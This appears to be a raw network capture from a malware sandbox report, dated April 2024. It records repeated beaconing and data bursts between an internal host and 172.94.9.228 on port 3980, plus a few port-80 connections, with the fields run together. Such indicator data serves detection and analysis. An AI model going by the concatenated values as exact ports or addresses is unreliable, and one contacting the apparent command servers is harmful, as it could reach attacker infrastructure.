                                                                                                                                                              Apr 26, 2024 09:42:05.678620100 CEST398050302172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:05.678636074 CEST503023980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:42:05.678652048 CEST398050302172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:05.678675890 CEST398050302172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:05.678699970 CEST398050302172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:05.678702116 CEST503023980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:42:05.678766012 CEST503023980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:42:05.678823948 CEST398050302172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:05.678857088 CEST503023980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:42:05.678968906 CEST398050302172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:05.678997040 CEST398050302172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:05.679022074 CEST398050302172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:05.679080963 CEST398050302172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:05.679085970 CEST503023980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:42:05.679119110 CEST398050302172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:05.679141998 CEST398050302172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:05.679164886 CEST398050302172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:05.679167986 CEST503023980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:42:05.679195881 CEST398050302172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:05.679218054 CEST398050302172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:05.679239035 CEST398050302172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:05.679311991 CEST503023980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:42:05.679429054 CEST503023980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:42:08.987984896 CEST503023980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:42:08.988008976 CEST503023980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:42:08.988059044 CEST503023980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:42:09.258029938 CEST398050302172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:09.258094072 CEST398050302172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:09.258383036 CEST503023980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:42:09.258493900 CEST503023980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:42:09.258845091 CEST398050302172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:09.258968115 CEST398050302172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:09.259015083 CEST398050302172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:09.528640985 CEST398050302172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:09.528943062 CEST398050302172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:09.529000998 CEST398050302172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:09.530795097 CEST398050302172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:09.531016111 CEST503023980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:42:14.383660078 CEST398050301172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:14.385768890 CEST503013980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:42:14.711669922 CEST398050301172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:30.024758101 CEST805030094.156.8.104192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:44.401772976 CEST398050301172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:42:44.403781891 CEST503013980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:42:44.729360104 CEST398050301172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:43:14.446170092 CEST398050301172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:43:14.447489023 CEST503013980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:43:14.774113894 CEST398050301172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:43:43.744060993 CEST5030380192.168.11.20178.237.33.50
                                                                                                                                                              Apr 26, 2024 09:43:44.243899107 CEST5030380192.168.11.20178.237.33.50
                                                                                                                                                              Apr 26, 2024 09:43:44.478069067 CEST398050301172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:43:44.480221987 CEST503013980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:43:44.805493116 CEST398050301172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:43:45.228017092 CEST5030380192.168.11.20178.237.33.50
                                                                                                                                                              Apr 26, 2024 09:43:47.180711985 CEST5030380192.168.11.20178.237.33.50
                                                                                                                                                              Apr 26, 2024 09:43:51.086107969 CEST5030380192.168.11.20178.237.33.50
                                                                                                                                                              Apr 26, 2024 09:43:58.881261110 CEST5030380192.168.11.20178.237.33.50
                                                                                                                                                              Apr 26, 2024 09:44:14.471592903 CEST5030380192.168.11.20178.237.33.50
                                                                                                                                                              Apr 26, 2024 09:44:14.504074097 CEST398050301172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:44:14.506159067 CEST503013980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:44:14.824481010 CEST398050301172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:44:44.523228884 CEST398050301172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:44:44.524676085 CEST503013980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:44:44.845527887 CEST398050301172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:45:14.572390079 CEST398050301172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:45:14.573755980 CEST503013980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:45:14.899357080 CEST398050301172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:45:44.602519989 CEST398050301172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:45:44.603796005 CEST503013980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:45:44.937427044 CEST398050301172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:14.616755962 CEST398050301172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:14.619790077 CEST503013980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:14.948395967 CEST398050301172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:44.651550055 CEST398050301172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:44.654102087 CEST503013980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:44.993961096 CEST398050301172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:49.046061993 CEST398050301172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:49.050848961 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:49.093540907 CEST503013980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:49.320775986 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:49.320962906 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:49.321563959 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:49.650688887 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:50.841021061 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:50.841044903 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:50.841124058 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:51.110943079 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.111087084 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.111094952 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:51.111273050 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:51.111469984 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:51.111967087 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.111979008 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.112020016 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.112133980 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:51.112338066 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:51.380991936 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.381122112 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:51.381211042 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.381278992 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:51.381339073 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.381350040 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.381462097 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:51.381635904 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:51.381835938 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.382015944 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.382020950 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:51.382173061 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:51.382330894 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:51.382867098 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.382877111 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.382968903 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.382989883 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.382991076 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:51.383151054 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:51.652142048 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.652254105 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.652292013 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.652312994 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.652467966 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.652481079 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.652488947 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.652497053 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.652518034 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.652527094 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.652653933 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.652664900 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.652776003 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.652787924 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.652913094 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.653995037 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:51.702325106 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:52.718575001 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:52.718597889 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:52.718677998 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:52.718844891 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:52.719022036 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:52.719178915 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:52.988548994 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:52.988727093 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:52.988787889 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:52.988799095 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:52.988806963 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:52.989065886 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:52.989345074 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:52.989356995 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:52.989545107 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:52.990020990 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:52.990032911 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:52.990134001 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:52.990144968 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:52.990153074 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:52.990161896 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:52.990170002 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:52.990272045 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:52.990283966 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:52.990292072 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:52.990385056 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:52.990396976 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:52.990406036 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:52.990641117 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:52.990652084 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:52.990660906 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:52.990669012 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:52.990677118 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:52.990684986 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:53.259319067 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:53.259553909 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:53.259671926 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:53.259788990 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:53.260268927 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:53.265706062 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:53.311367989 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:53.770051003 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:53.770128965 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:53.770178080 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:53.770339012 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:53.770513058 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:53.770658016 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:54.040225983 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.040410042 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:54.040918112 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.040929079 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.041098118 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:54.041101933 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.041115046 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.041122913 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.041143894 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.041152954 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.041193962 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.041202068 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.041253090 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:54.041436911 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:54.042093039 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.042104006 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.042196989 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.042207956 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.042216063 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.042223930 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.042332888 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.042344093 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.042351961 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.042457104 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.042469025 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.042490005 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.042512894 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.042521000 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.042629004 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.310321093 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.310765982 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.311158895 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.311604023 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.311706066 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.311717033 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.317429066 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.358026981 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:54.464031935 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:54.464155912 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:54.464255095 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:54.464410067 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:54.464576006 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:54.464766979 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:54.764216900 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:54.790170908 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.897945881 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.898073912 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.898097992 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.898119926 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.898329020 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.898354053 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.898375988 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.898396969 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.898406982 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.898415089 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.898422003 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.898442984 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.898451090 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.898608923 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.898619890 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.898628950 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.898649931 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.898658037 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.898678064 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.898686886 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.898694992 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.898703098 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.898797035 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.898808002 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.898816109 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.898824930 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.898917913 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.898979902 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.898988962 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.901560068 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:54.951636076 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:55.034251928 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.048515081 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:55.048688889 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:55.048758030 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:55.048887014 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:55.049082041 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:55.049223900 CEST503043980192.168.11.20172.94.9.228
                                                                                                                                                              Apr 26, 2024 09:46:55.368436098 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.483412981 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.483694077 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.483705044 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.483726025 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.483735085 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.483993053 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.484004021 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.484011889 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.484019995 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.484026909 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.484035015 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.484041929 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.484050035 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.484276056 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.484287024 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.484294891 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.484302998 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.484575987 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.484586954 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.484595060 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.484602928 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.484870911 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.484882116 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.484889030 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.484896898 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.484905005 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.484911919 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.484919071 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.484926939 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.490308046 CEST398050304172.94.9.228192.168.11.20
                                                                                                                                                              Apr 26, 2024 09:46:55.545258045 CEST503043980192.168.11.20172.94.9.228
